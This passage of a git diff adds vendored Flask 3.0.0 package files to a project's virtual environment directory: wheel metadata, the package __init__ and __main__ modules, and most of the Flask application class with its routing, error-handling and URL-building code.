b/env/Lib/site-packages/flask-3.0.0.dist-info/WHEEL @@ -0,0 +1,4 @@ +Wheel-Version: 1.0 +Generator: flit 3.9.0 +Root-Is-Purelib: true +Tag: py3-none-any diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/entry_points.txt b/env/Lib/site-packages/flask-3.0.0.dist-info/entry_points.txt new file mode 100644 index 00000000..eec6733e --- /dev/null +++ b/env/Lib/site-packages/flask-3.0.0.dist-info/entry_points.txt @@ -0,0 +1,3 @@ +[console_scripts] +flask=flask.cli:main + diff --git a/env/Lib/site-packages/flask/__init__.py b/env/Lib/site-packages/flask/__init__.py new file mode 100644 index 00000000..e86eb43e --- /dev/null +++ b/env/Lib/site-packages/flask/__init__.py @@ -0,0 +1,60 @@ +from __future__ import annotations + +import typing as t + +from . import json as json +from .app import Flask as Flask +from .blueprints import Blueprint as Blueprint +from .config import Config as Config +from .ctx import after_this_request as after_this_request +from .ctx import copy_current_request_context as copy_current_request_context +from .ctx import has_app_context as has_app_context +from .ctx import has_request_context as has_request_context +from .globals import current_app as current_app +from .globals import g as g +from .globals import request as request +from .globals import session as session +from .helpers import abort as abort +from .helpers import flash as flash +from .helpers import get_flashed_messages as get_flashed_messages +from .helpers import get_template_attribute as get_template_attribute +from .helpers import make_response as make_response +from .helpers import redirect as redirect +from .helpers import send_file as send_file +from .helpers import send_from_directory as send_from_directory +from .helpers import stream_with_context as stream_with_context +from .helpers import url_for as url_for +from .json import jsonify as jsonify +from .signals import appcontext_popped as appcontext_popped +from .signals import appcontext_pushed as appcontext_pushed +from .signals import appcontext_tearing_down as appcontext_tearing_down +from .signals import before_render_template as before_render_template +from .signals import got_request_exception as got_request_exception +from .signals import message_flashed as message_flashed +from .signals import request_finished as request_finished +from .signals import request_started as request_started +from .signals import request_tearing_down as request_tearing_down +from .signals import template_rendered as template_rendered +from .templating import render_template as render_template +from .templating import render_template_string as render_template_string +from .templating import stream_template as stream_template +from .templating import stream_template_string as stream_template_string +from .wrappers import Request as Request +from .wrappers import Response as Response + + +def __getattr__(name: str) -> t.Any: + if name == "__version__": + import importlib.metadata + import warnings + + warnings.warn( + "The '__version__' attribute is deprecated and will be removed in" + " Flask 3.1. Use feature detection or" + " 'importlib.metadata.version(\"flask\")' instead.", + DeprecationWarning, + stacklevel=2, + ) + return importlib.metadata.version("flask") + + raise AttributeError(name) diff --git a/env/Lib/site-packages/flask/__main__.py b/env/Lib/site-packages/flask/__main__.py new file mode 100644 index 00000000..4e28416e --- /dev/null +++ b/env/Lib/site-packages/flask/__main__.py @@ -0,0 +1,3 @@ +from .cli import main + +main() diff --git a/env/Lib/site-packages/flask/app.py b/env/Lib/site-packages/flask/app.py new file mode 100644 index 00000000..d710cb96 --- /dev/null +++ b/env/Lib/site-packages/flask/app.py @@ -0,0 +1,1478 @@ +from __future__ import annotations + +import os +import sys +import typing as t +import weakref +from collections.abc import Iterator as _abc_Iterator +from datetime import timedelta +from inspect import iscoroutinefunction +from itertools import chain +from types import TracebackType +from urllib.parse import quote as _url_quote + +import click +from werkzeug.datastructures import Headers +from werkzeug.datastructures import ImmutableDict +from werkzeug.exceptions import BadRequestKeyError +from werkzeug.exceptions import HTTPException +from werkzeug.exceptions import InternalServerError +from werkzeug.routing import BuildError +from werkzeug.routing import MapAdapter +from werkzeug.routing import RequestRedirect +from werkzeug.routing import RoutingException +from werkzeug.routing import Rule +from werkzeug.serving import is_running_from_reloader +from werkzeug.wrappers import Response as BaseResponse + +from . import cli +from . import typing as ft +from .ctx import AppContext +from .ctx import RequestContext +from .globals import _cv_app +from .globals import _cv_request +from .globals import current_app +from .globals import g +from .globals import request +from .globals import request_ctx +from .globals import session +from .helpers import get_debug_flag +from .helpers import get_flashed_messages +from .helpers import get_load_dotenv +from .helpers import send_from_directory +from .sansio.app import App +from .sansio.scaffold import _sentinel +from .sessions import SecureCookieSessionInterface +from .sessions import SessionInterface +from .signals import appcontext_tearing_down +from .signals import got_request_exception +from .signals import request_finished +from .signals import request_started +from .signals import request_tearing_down +from .templating import Environment +from .wrappers import Request +from .wrappers import Response + +if t.TYPE_CHECKING: # pragma: no cover + from .testing import FlaskClient + from .testing import FlaskCliRunner + +T_shell_context_processor = t.TypeVar( + "T_shell_context_processor", bound=ft.ShellContextProcessorCallable +) +T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) +T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable) +T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable) +T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable) + + +def _make_timedelta(value: timedelta | int | None) -> timedelta | None: + if value is None or isinstance(value, timedelta): + return value + + return timedelta(seconds=value) + + +class Flask(App): + """The flask object implements a WSGI application and acts as the central + object. It is passed the name of the module or package of the + application. Once it is created it will act as a central registry for + the view functions, the URL rules, template configuration and much more. + + The name of the package is used to resolve resources from inside the + package or the folder the module is contained in depending on if the + package parameter resolves to an actual python package (a folder with + an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file). + + For more information about resource loading, see :func:`open_resource`. + + Usually you create a :class:`Flask` instance in your main module or + in the :file:`__init__.py` file of your package like this:: + + from flask import Flask + app = Flask(__name__) + + .. admonition:: About the First Parameter + + The idea of the first parameter is to give Flask an idea of what + belongs to your application. This name is used to find resources + on the filesystem, can be used by extensions to improve debugging + information and a lot more. + + So it's important what you provide there. If you are using a single + module, `__name__` is always the correct value. If you however are + using a package, it's usually recommended to hardcode the name of + your package there. + + For example if your application is defined in :file:`yourapplication/app.py` + you should create it with one of the two versions below:: + + app = Flask('yourapplication') + app = Flask(__name__.split('.')[0]) + + Why is that? The application will work even with `__name__`, thanks + to how resources are looked up. However it will make debugging more + painful. Certain extensions can make assumptions based on the + import name of your application. For example the Flask-SQLAlchemy + extension will look for the code in your application that triggered + an SQL query in debug mode. If the import name is not properly set + up, that debugging information is lost. (For example it would only + pick up SQL queries in `yourapplication.app` and not + `yourapplication.views.frontend`) + + .. versionadded:: 0.7 + The `static_url_path`, `static_folder`, and `template_folder` + parameters were added. + + .. versionadded:: 0.8 + The `instance_path` and `instance_relative_config` parameters were + added. + + .. versionadded:: 0.11 + The `root_path` parameter was added. + + .. versionadded:: 1.0 + The ``host_matching`` and ``static_host`` parameters were added. + + .. versionadded:: 1.0 + The ``subdomain_matching`` parameter was added. Subdomain + matching needs to be enabled manually now. Setting + :data:`SERVER_NAME` does not implicitly enable it. + + :param import_name: the name of the application package + :param static_url_path: can be used to specify a different path for the + static files on the web. Defaults to the name + of the `static_folder` folder. + :param static_folder: The folder with static files that is served at + ``static_url_path``. Relative to the application ``root_path`` + or an absolute path. Defaults to ``'static'``. + :param static_host: the host to use when adding the static route. + Defaults to None. Required when using ``host_matching=True`` + with a ``static_folder`` configured. + :param host_matching: set ``url_map.host_matching`` attribute. + Defaults to False. + :param subdomain_matching: consider the subdomain relative to + :data:`SERVER_NAME` when matching routes. Defaults to False. + :param template_folder: the folder that contains the templates that should + be used by the application. Defaults to + ``'templates'`` folder in the root path of the + application. + :param instance_path: An alternative instance path for the application. + By default the folder ``'instance'`` next to the + package or module is assumed to be the instance + path. + :param instance_relative_config: if set to ``True`` relative filenames + for loading the config are assumed to + be relative to the instance path instead + of the application root. + :param root_path: The path to the root of the application files. + This should only be set manually when it can't be detected + automatically, such as for namespace packages. + """ + + default_config = ImmutableDict( + { + "DEBUG": None, + "TESTING": False, + "PROPAGATE_EXCEPTIONS": None, + "SECRET_KEY": None, + "PERMANENT_SESSION_LIFETIME": timedelta(days=31), + "USE_X_SENDFILE": False, + "SERVER_NAME": None, + "APPLICATION_ROOT": "/", + "SESSION_COOKIE_NAME": "session", + "SESSION_COOKIE_DOMAIN": None, + "SESSION_COOKIE_PATH": None, + "SESSION_COOKIE_HTTPONLY": True, + "SESSION_COOKIE_SECURE": False, + "SESSION_COOKIE_SAMESITE": None, + "SESSION_REFRESH_EACH_REQUEST": True, + "MAX_CONTENT_LENGTH": None, + "SEND_FILE_MAX_AGE_DEFAULT": None, + "TRAP_BAD_REQUEST_ERRORS": None, + "TRAP_HTTP_EXCEPTIONS": False, + "EXPLAIN_TEMPLATE_LOADING": False, + "PREFERRED_URL_SCHEME": "http", + "TEMPLATES_AUTO_RELOAD": None, + "MAX_COOKIE_SIZE": 4093, + } + ) + + #: The class that is used for request objects. See :class:`~flask.Request` + #: for more information. + request_class = Request + + #: The class that is used for response objects. See + #: :class:`~flask.Response` for more information. + response_class = Response + + #: the session interface to use. By default an instance of + #: :class:`~flask.sessions.SecureCookieSessionInterface` is used here. + #: + #: .. versionadded:: 0.8 + session_interface: SessionInterface = SecureCookieSessionInterface() + + def __init__( + self, + import_name: str, + static_url_path: str | None = None, + static_folder: str | os.PathLike | None = "static", + static_host: str | None = None, + host_matching: bool = False, + subdomain_matching: bool = False, + template_folder: str | os.PathLike | None = "templates", + instance_path: str | None = None, + instance_relative_config: bool = False, + root_path: str | None = None, + ): + super().__init__( + import_name=import_name, + static_url_path=static_url_path, + static_folder=static_folder, + static_host=static_host, + host_matching=host_matching, + subdomain_matching=subdomain_matching, + template_folder=template_folder, + instance_path=instance_path, + instance_relative_config=instance_relative_config, + root_path=root_path, + ) + + # Add a static route using the provided static_url_path, static_host, + # and static_folder if there is a configured static_folder. + # Note we do this without checking if static_folder exists. + # For one, it might be created while the server is running (e.g. during + # development). Also, Google App Engine stores static files somewhere + if self.has_static_folder: + assert ( + bool(static_host) == host_matching + ), "Invalid static_host/host_matching combination" + # Use a weakref to avoid creating a reference cycle between the app + # and the view function (see #3761). + self_ref = weakref.ref(self) + self.add_url_rule( + f"{self.static_url_path}/", + endpoint="static", + host=static_host, + view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 + ) + + def get_send_file_max_age(self, filename: str | None) -> int | None: + """Used by :func:`send_file` to determine the ``max_age`` cache + value for a given file path if it wasn't passed. + + By default, this returns :data:`SEND_FILE_MAX_AGE_DEFAULT` from + the configuration of :data:`~flask.current_app`. This defaults + to ``None``, which tells the browser to use conditional requests + instead of a timed cache, which is usually preferable. + + Note this is a duplicate of the same method in the Flask + class. + + .. versionchanged:: 2.0 + The default configuration is ``None`` instead of 12 hours. + + .. versionadded:: 0.9 + """ + value = current_app.config["SEND_FILE_MAX_AGE_DEFAULT"] + + if value is None: + return None + + if isinstance(value, timedelta): + return int(value.total_seconds()) + + return value + + def send_static_file(self, filename: str) -> Response: + """The view function used to serve files from + :attr:`static_folder`. A route is automatically registered for + this view at :attr:`static_url_path` if :attr:`static_folder` is + set. + + Note this is a duplicate of the same method in the Flask + class. + + .. versionadded:: 0.5 + + """ + if not self.has_static_folder: + raise RuntimeError("'static_folder' must be set to serve static_files.") + + # send_file only knows to call get_send_file_max_age on the app, + # call it here so it works for blueprints too. + max_age = self.get_send_file_max_age(filename) + return send_from_directory( + t.cast(str, self.static_folder), filename, max_age=max_age + ) + + def open_resource(self, resource: str, mode: str = "rb") -> t.IO[t.AnyStr]: + """Open a resource file relative to :attr:`root_path` for + reading. + + For example, if the file ``schema.sql`` is next to the file + ``app.py`` where the ``Flask`` app is defined, it can be opened + with: + + .. code-block:: python + + with app.open_resource("schema.sql") as f: + conn.executescript(f.read()) + + :param resource: Path to the resource relative to + :attr:`root_path`. + :param mode: Open the file in this mode. Only reading is + supported, valid values are "r" (or "rt") and "rb". + + Note this is a duplicate of the same method in the Flask + class. + + """ + if mode not in {"r", "rt", "rb"}: + raise ValueError("Resources can only be opened for reading.") + + return open(os.path.join(self.root_path, resource), mode) + + def open_instance_resource(self, resource: str, mode: str = "rb") -> t.IO[t.AnyStr]: + """Opens a resource from the application's instance folder + (:attr:`instance_path`). Otherwise works like + :meth:`open_resource`. Instance resources can also be opened for + writing. + + :param resource: the name of the resource. To access resources within + subfolders use forward slashes as separator. + :param mode: resource file opening mode, default is 'rb'. + """ + return open(os.path.join(self.instance_path, resource), mode) + + def create_jinja_environment(self) -> Environment: + """Create the Jinja environment based on :attr:`jinja_options` + and the various Jinja-related methods of the app. Changing + :attr:`jinja_options` after this will have no effect. Also adds + Flask-related globals and filters to the environment. + + .. versionchanged:: 0.11 + ``Environment.auto_reload`` set in accordance with + ``TEMPLATES_AUTO_RELOAD`` configuration option. + + .. versionadded:: 0.5 + """ + options = dict(self.jinja_options) + + if "autoescape" not in options: + options["autoescape"] = self.select_jinja_autoescape + + if "auto_reload" not in options: + auto_reload = self.config["TEMPLATES_AUTO_RELOAD"] + + if auto_reload is None: + auto_reload = self.debug + + options["auto_reload"] = auto_reload + + rv = self.jinja_environment(self, **options) + rv.globals.update( + url_for=self.url_for, + get_flashed_messages=get_flashed_messages, + config=self.config, + # request, session and g are normally added with the + # context processor for efficiency reasons but for imported + # templates we also want the proxies in there. + request=request, + session=session, + g=g, + ) + rv.policies["json.dumps_function"] = self.json.dumps + return rv + + def create_url_adapter(self, request: Request | None) -> MapAdapter | None: + """Creates a URL adapter for the given request. The URL adapter + is created at a point where the request context is not yet set + up so the request is passed explicitly. + + .. versionadded:: 0.6 + + .. versionchanged:: 0.9 + This can now also be called without a request object when the + URL adapter is created for the application context. + + .. versionchanged:: 1.0 + :data:`SERVER_NAME` no longer implicitly enables subdomain + matching. Use :attr:`subdomain_matching` instead. + """ + if request is not None: + # If subdomain matching is disabled (the default), use the + # default subdomain in all cases. This should be the default + # in Werkzeug but it currently does not have that feature. + if not self.subdomain_matching: + subdomain = self.url_map.default_subdomain or None + else: + subdomain = None + + return self.url_map.bind_to_environ( + request.environ, + server_name=self.config["SERVER_NAME"], + subdomain=subdomain, + ) + # We need at the very least the server name to be set for this + # to work. + if self.config["SERVER_NAME"] is not None: + return self.url_map.bind( + self.config["SERVER_NAME"], + script_name=self.config["APPLICATION_ROOT"], + url_scheme=self.config["PREFERRED_URL_SCHEME"], + ) + + return None + + def raise_routing_exception(self, request: Request) -> t.NoReturn: + """Intercept routing exceptions and possibly do something else. + + In debug mode, intercept a routing redirect and replace it with + an error if the body will be discarded. + + With modern Werkzeug this shouldn't occur, since it now uses a + 308 status which tells the browser to resend the method and + body. + + .. versionchanged:: 2.1 + Don't intercept 307 and 308 redirects. + + :meta private: + :internal: + """ + if ( + not self.debug + or not isinstance(request.routing_exception, RequestRedirect) + or request.routing_exception.code in {307, 308} + or request.method in {"GET", "HEAD", "OPTIONS"} + ): + raise request.routing_exception # type: ignore + + from .debughelpers import FormDataRoutingRedirect + + raise FormDataRoutingRedirect(request) + + def update_template_context(self, context: dict) -> None: + """Update the template context with some commonly used variables. + This injects request, session, config and g into the template + context as well as everything template context processors want + to inject. Note that the as of Flask 0.6, the original values + in the context will not be overridden if a context processor + decides to return a value with the same key. + + :param context: the context as a dictionary that is updated in place + to add extra variables. + """ + names: t.Iterable[str | None] = (None,) + + # A template may be rendered outside a request context. + if request: + names = chain(names, reversed(request.blueprints)) + + # The values passed to render_template take precedence. Keep a + # copy to re-apply after all context functions. + orig_ctx = context.copy() + + for name in names: + if name in self.template_context_processors: + for func in self.template_context_processors[name]: + context.update(self.ensure_sync(func)()) + + context.update(orig_ctx) + + def make_shell_context(self) -> dict: + """Returns the shell context for an interactive shell for this + application. This runs all the registered shell context + processors. + + .. versionadded:: 0.11 + """ + rv = {"app": self, "g": g} + for processor in self.shell_context_processors: + rv.update(processor()) + return rv + + def run( + self, + host: str | None = None, + port: int | None = None, + debug: bool | None = None, + load_dotenv: bool = True, + **options: t.Any, + ) -> None: + """Runs the application on a local development server. + + Do not use ``run()`` in a production setting. It is not intended to + meet security and performance requirements for a production server. + Instead, see :doc:`/deploying/index` for WSGI server recommendations. + + If the :attr:`debug` flag is set the server will automatically reload + for code changes and show a debugger in case an exception happened. + + If you want to run the application in debug mode, but disable the + code execution on the interactive debugger, you can pass + ``use_evalex=False`` as parameter. This will keep the debugger's + traceback screen active, but disable code execution. + + It is not recommended to use this function for development with + automatic reloading as this is badly supported. Instead you should + be using the :command:`flask` command line script's ``run`` support. + + .. admonition:: Keep in Mind + + Flask will suppress any server error with a generic error page + unless it is in debug mode. As such to enable just the + interactive debugger without the code reloading, you have to + invoke :meth:`run` with ``debug=True`` and ``use_reloader=False``. + Setting ``use_debugger`` to ``True`` without being in debug mode + won't catch any exceptions because there won't be any to + catch. + + :param host: the hostname to listen on. Set this to ``'0.0.0.0'`` to + have the server available externally as well. Defaults to + ``'127.0.0.1'`` or the host in the ``SERVER_NAME`` config variable + if present. + :param port: the port of the webserver. Defaults to ``5000`` or the + port defined in the ``SERVER_NAME`` config variable if present. + :param debug: if given, enable or disable debug mode. See + :attr:`debug`. + :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv` + files to set environment variables. Will also change the working + directory to the directory containing the first file found. + :param options: the options to be forwarded to the underlying Werkzeug + server. See :func:`werkzeug.serving.run_simple` for more + information. + + .. versionchanged:: 1.0 + If installed, python-dotenv will be used to load environment + variables from :file:`.env` and :file:`.flaskenv` files. + + The :envvar:`FLASK_DEBUG` environment variable will override :attr:`debug`. + + Threaded mode is enabled by default. + + .. versionchanged:: 0.10 + The default port is now picked from the ``SERVER_NAME`` + variable. + """ + # Ignore this call so that it doesn't start another server if + # the 'flask run' command is used. + if os.environ.get("FLASK_RUN_FROM_CLI") == "true": + if not is_running_from_reloader(): + click.secho( + " * Ignoring a call to 'app.run()' that would block" + " the current 'flask' CLI command.\n" + " Only call 'app.run()' in an 'if __name__ ==" + ' "__main__"\' guard.', + fg="red", + ) + + return + + if get_load_dotenv(load_dotenv): + cli.load_dotenv() + + # if set, env var overrides existing value + if "FLASK_DEBUG" in os.environ: + self.debug = get_debug_flag() + + # debug passed to method overrides all other sources + if debug is not None: + self.debug = bool(debug) + + server_name = self.config.get("SERVER_NAME") + sn_host = sn_port = None + + if server_name: + sn_host, _, sn_port = server_name.partition(":") + + if not host: + if sn_host: + host = sn_host + else: + host = "127.0.0.1" + + if port or port == 0: + port = int(port) + elif sn_port: + port = int(sn_port) + else: + port = 5000 + + options.setdefault("use_reloader", self.debug) + options.setdefault("use_debugger", self.debug) + options.setdefault("threaded", True) + + cli.show_server_banner(self.debug, self.name) + + from werkzeug.serving import run_simple + + try: + run_simple(t.cast(str, host), port, self, **options) + finally: + # reset the first request information if the development server + # reset normally. This makes it possible to restart the server + # without reloader and that stuff from an interactive shell. + self._got_first_request = False + + def test_client(self, use_cookies: bool = True, **kwargs: t.Any) -> FlaskClient: + """Creates a test client for this application. For information + about unit testing head over to :doc:`/testing`. + + Note that if you are testing for assertions or exceptions in your + application code, you must set ``app.testing = True`` in order for the + exceptions to propagate to the test client. Otherwise, the exception + will be handled by the application (not visible to the test client) and + the only indication of an AssertionError or other exception will be a + 500 status code response to the test client. See the :attr:`testing` + attribute. For example:: + + app.testing = True + client = app.test_client() + + The test client can be used in a ``with`` block to defer the closing down + of the context until the end of the ``with`` block. This is useful if + you want to access the context locals for testing:: + + with app.test_client() as c: + rv = c.get('/?vodka=42') + assert request.args['vodka'] == '42' + + Additionally, you may pass optional keyword arguments that will then + be passed to the application's :attr:`test_client_class` constructor. + For example:: + + from flask.testing import FlaskClient + + class CustomClient(FlaskClient): + def __init__(self, *args, **kwargs): + self._authentication = kwargs.pop("authentication") + super(CustomClient,self).__init__( *args, **kwargs) + + app.test_client_class = CustomClient + client = app.test_client(authentication='Basic ....') + + See :class:`~flask.testing.FlaskClient` for more information. + + .. versionchanged:: 0.4 + added support for ``with`` block usage for the client. + + .. versionadded:: 0.7 + The `use_cookies` parameter was added as well as the ability + to override the client to be used by setting the + :attr:`test_client_class` attribute. + + .. versionchanged:: 0.11 + Added `**kwargs` to support passing additional keyword arguments to + the constructor of :attr:`test_client_class`. + """ + cls = self.test_client_class + if cls is None: + from .testing import FlaskClient as cls + return cls( # type: ignore + self, self.response_class, use_cookies=use_cookies, **kwargs + ) + + def test_cli_runner(self, **kwargs: t.Any) -> FlaskCliRunner: + """Create a CLI runner for testing CLI commands. + See :ref:`testing-cli`. + + Returns an instance of :attr:`test_cli_runner_class`, by default + :class:`~flask.testing.FlaskCliRunner`. The Flask app object is + passed as the first argument. + + .. versionadded:: 1.0 + """ + cls = self.test_cli_runner_class + + if cls is None: + from .testing import FlaskCliRunner as cls + + return cls(self, **kwargs) # type: ignore + + def handle_http_exception( + self, e: HTTPException + ) -> HTTPException | ft.ResponseReturnValue: + """Handles an HTTP exception. By default this will invoke the + registered error handlers and fall back to returning the + exception as response. + + .. versionchanged:: 1.0.3 + ``RoutingException``, used internally for actions such as + slash redirects during routing, is not passed to error + handlers. + + .. versionchanged:: 1.0 + Exceptions are looked up by code *and* by MRO, so + ``HTTPException`` subclasses can be handled with a catch-all + handler for the base ``HTTPException``. + + .. versionadded:: 0.3 + """ + # Proxy exceptions don't have error codes. We want to always return + # those unchanged as errors + if e.code is None: + return e + + # RoutingExceptions are used internally to trigger routing + # actions, such as slash redirects raising RequestRedirect. They + # are not raised or handled in user code. + if isinstance(e, RoutingException): + return e + + handler = self._find_error_handler(e, request.blueprints) + if handler is None: + return e + return self.ensure_sync(handler)(e) + + def handle_user_exception( + self, e: Exception + ) -> HTTPException | ft.ResponseReturnValue: + """This method is called whenever an exception occurs that + should be handled. A special case is :class:`~werkzeug + .exceptions.HTTPException` which is forwarded to the + :meth:`handle_http_exception` method. This function will either + return a response value or reraise the exception with the same + traceback. + + .. versionchanged:: 1.0 + Key errors raised from request data like ``form`` show the + bad key in debug mode rather than a generic bad request + message. + + .. versionadded:: 0.7 + """ + if isinstance(e, BadRequestKeyError) and ( + self.debug or self.config["TRAP_BAD_REQUEST_ERRORS"] + ): + e.show_exception = True + + if isinstance(e, HTTPException) and not self.trap_http_exception(e): + return self.handle_http_exception(e) + + handler = self._find_error_handler(e, request.blueprints) + + if handler is None: + raise + + return self.ensure_sync(handler)(e) + + def handle_exception(self, e: Exception) -> Response: + """Handle an exception that did not have an error handler + associated with it, or that was raised from an error handler. + This always causes a 500 ``InternalServerError``. + + Always sends the :data:`got_request_exception` signal. + + If :data:`PROPAGATE_EXCEPTIONS` is ``True``, such as in debug + mode, the error will be re-raised so that the debugger can + display it. Otherwise, the original exception is logged, and + an :exc:`~werkzeug.exceptions.InternalServerError` is returned. + + If an error handler is registered for ``InternalServerError`` or + ``500``, it will be used. For consistency, the handler will + always receive the ``InternalServerError``. The original + unhandled exception is available as ``e.original_exception``. + + .. versionchanged:: 1.1.0 + Always passes the ``InternalServerError`` instance to the + handler, setting ``original_exception`` to the unhandled + error. + + .. versionchanged:: 1.1.0 + ``after_request`` functions and other finalization is done + even for the default 500 response when there is no handler. + + .. versionadded:: 0.3 + """ + exc_info = sys.exc_info() + got_request_exception.send(self, _async_wrapper=self.ensure_sync, exception=e) + propagate = self.config["PROPAGATE_EXCEPTIONS"] + + if propagate is None: + propagate = self.testing or self.debug + + if propagate: + # Re-raise if called with an active exception, otherwise + # raise the passed in exception. + if exc_info[1] is e: + raise + + raise e + + self.log_exception(exc_info) + server_error: InternalServerError | ft.ResponseReturnValue + server_error = InternalServerError(original_exception=e) + handler = self._find_error_handler(server_error, request.blueprints) + + if handler is not None: + server_error = self.ensure_sync(handler)(server_error) + + return self.finalize_request(server_error, from_error_handler=True) + + def log_exception( + self, + exc_info: (tuple[type, BaseException, TracebackType] | tuple[None, None, None]), + ) -> None: + """Logs an exception. This is called by :meth:`handle_exception` + if debugging is disabled and right before the handler is called. + The default implementation logs the exception as error on the + :attr:`logger`. + + .. versionadded:: 0.8 + """ + self.logger.error( + f"Exception on {request.path} [{request.method}]", exc_info=exc_info + ) + + def dispatch_request(self) -> ft.ResponseReturnValue: + """Does the request dispatching. Matches the URL and returns the + return value of the view or error handler. This does not have to + be a response object. In order to convert the return value to a + proper response object, call :func:`make_response`. + + .. versionchanged:: 0.7 + This no longer does the exception handling, this code was + moved to the new :meth:`full_dispatch_request`. + """ + req = request_ctx.request + if req.routing_exception is not None: + self.raise_routing_exception(req) + rule: Rule = req.url_rule # type: ignore[assignment] + # if we provide automatic options for this URL and the + # request came with the OPTIONS method, reply automatically + if ( + getattr(rule, "provide_automatic_options", False) + and req.method == "OPTIONS" + ): + return self.make_default_options_response() + # otherwise dispatch to the handler for that endpoint + view_args: dict[str, t.Any] = req.view_args # type: ignore[assignment] + return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) + + def full_dispatch_request(self) -> Response: + """Dispatches the request and on top of that performs request + pre and postprocessing as well as HTTP exception catching and + error handling. + + .. versionadded:: 0.7 + """ + self._got_first_request = True + + try: + request_started.send(self, _async_wrapper=self.ensure_sync) + rv = self.preprocess_request() + if rv is None: + rv = self.dispatch_request() + except Exception as e: + rv = self.handle_user_exception(e) + return self.finalize_request(rv) + + def finalize_request( + self, + rv: ft.ResponseReturnValue | HTTPException, + from_error_handler: bool = False, + ) -> Response: + """Given the return value from a view function this finalizes + the request by converting it into a response and invoking the + postprocessing functions. This is invoked for both normal + request dispatching as well as error handlers. + + Because this means that it might be called as a result of a + failure a special safe mode is available which can be enabled + with the `from_error_handler` flag. If enabled, failures in + response processing will be logged and otherwise ignored. + + :internal: + """ + response = self.make_response(rv) + try: + response = self.process_response(response) + request_finished.send( + self, _async_wrapper=self.ensure_sync, response=response + ) + except Exception: + if not from_error_handler: + raise + self.logger.exception( + "Request finalizing failed with an error while handling an error" + ) + return response + + def make_default_options_response(self) -> Response: + """This method is called to create the default ``OPTIONS`` response. + This can be changed through subclassing to change the default + behavior of ``OPTIONS`` responses. + + .. versionadded:: 0.7 + """ + adapter = request_ctx.url_adapter + methods = adapter.allowed_methods() # type: ignore[union-attr] + rv = self.response_class() + rv.allow.update(methods) + return rv + + def ensure_sync(self, func: t.Callable) -> t.Callable: + """Ensure that the function is synchronous for WSGI workers. + Plain ``def`` functions are returned as-is. ``async def`` + functions are wrapped to run and wait for the response. + + Override this method to change how the app runs async views. + + .. versionadded:: 2.0 + """ + if iscoroutinefunction(func): + return self.async_to_sync(func) + + return func + + def async_to_sync( + self, func: t.Callable[..., t.Coroutine] + ) -> t.Callable[..., t.Any]: + """Return a sync function that will run the coroutine function. + + .. code-block:: python + + result = app.async_to_sync(func)(*args, **kwargs) + + Override this method to change how the app converts async code + to be synchronously callable. + + .. versionadded:: 2.0 + """ + try: + from asgiref.sync import async_to_sync as asgiref_async_to_sync + except ImportError: + raise RuntimeError( + "Install Flask with the 'async' extra in order to use async views." + ) from None + + return asgiref_async_to_sync(func) + + def url_for( + self, + /, + endpoint: str, + *, + _anchor: str | None = None, + _method: str | None = None, + _scheme: str | None = None, + _external: bool | None = None, + **values: t.Any, + ) -> str: + """Generate a URL to the given endpoint with the given values. + + This is called by :func:`flask.url_for`, and can be called + directly as well. + + An *endpoint* is the name of a URL rule, usually added with + :meth:`@app.route() `, and usually the same name as the + view function. A route defined in a :class:`~flask.Blueprint` + will prepend the blueprint's name separated by a ``.`` to the + endpoint. + + In some cases, such as email messages, you want URLs to include + the scheme and domain, like ``https://example.com/hello``. When + not in an active request, URLs will be external by default, but + this requires setting :data:`SERVER_NAME` so Flask knows what + domain to use. :data:`APPLICATION_ROOT` and + :data:`PREFERRED_URL_SCHEME` should also be configured as + needed. This config is only used when not in an active request. + + Functions can be decorated with :meth:`url_defaults` to modify + keyword arguments before the URL is built. + + If building fails for some reason, such as an unknown endpoint + or incorrect values, the app's :meth:`handle_url_build_error` + method is called. If that returns a string, that is returned, + otherwise a :exc:`~werkzeug.routing.BuildError` is raised. + + :param endpoint: The endpoint name associated with the URL to + generate. If this starts with a ``.``, the current blueprint + name (if any) will be used. + :param _anchor: If given, append this as ``#anchor`` to the URL. + :param _method: If given, generate the URL associated with this + method for the endpoint. + :param _scheme: If given, the URL will have this scheme if it + is external. + :param _external: If given, prefer the URL to be internal + (False) or require it to be external (True). External URLs + include the scheme and domain. When not in an active + request, URLs are external by default. + :param values: Values to use for the variable parts of the URL + rule. Unknown keys are appended as query string arguments, + like ``?a=b&c=d``. + + .. versionadded:: 2.2 + Moved from ``flask.url_for``, which calls this method. + """ + req_ctx = _cv_request.get(None) + + if req_ctx is not None: + url_adapter = req_ctx.url_adapter + blueprint_name = req_ctx.request.blueprint + + # If the endpoint starts with "." and the request matches a + # blueprint, the endpoint is relative to the blueprint. + if endpoint[:1] == ".": + if blueprint_name is not None: + endpoint = f"{blueprint_name}{endpoint}" + else: + endpoint = endpoint[1:] + + # When in a request, generate a URL without scheme and + # domain by default, unless a scheme is given. + if _external is None: + _external = _scheme is not None + else: + app_ctx = _cv_app.get(None) + + # If called by helpers.url_for, an app context is active, + # use its url_adapter. Otherwise, app.url_for was called + # directly, build an adapter. + if app_ctx is not None: + url_adapter = app_ctx.url_adapter + else: + url_adapter = self.create_url_adapter(None) + + if url_adapter is None: + raise RuntimeError( + "Unable to build URLs outside an active request" + " without 'SERVER_NAME' configured. Also configure" + " 'APPLICATION_ROOT' and 'PREFERRED_URL_SCHEME' as" + " needed." + ) + + # When outside a request, generate a URL with scheme and + # domain by default. + if _external is None: + _external = True + + # It is an error to set _scheme when _external=False, in order + # to avoid accidental insecure URLs. + if _scheme is not None and not _external: + raise ValueError("When specifying '_scheme', '_external' must be True.") + + self.inject_url_defaults(endpoint, values) + + try: + rv = url_adapter.build( # type: ignore[union-attr] + endpoint, + values, + method=_method, + url_scheme=_scheme, + force_external=_external, + ) + except BuildError as error: + values.update( + _anchor=_anchor, _method=_method, _scheme=_scheme, _external=_external + ) + return self.handle_url_build_error(error, endpoint, values) + + if _anchor is not None: + _anchor = _url_quote(_anchor, safe="%!#$&'()*+,/:;=?@") + rv = f"{rv}#{_anchor}" + + return rv + + def make_response(self, rv: ft.ResponseReturnValue) -> Response: + """Convert the return value from a view function to an instance of + :attr:`response_class`. + + :param rv: the return value from the view function. The view function + 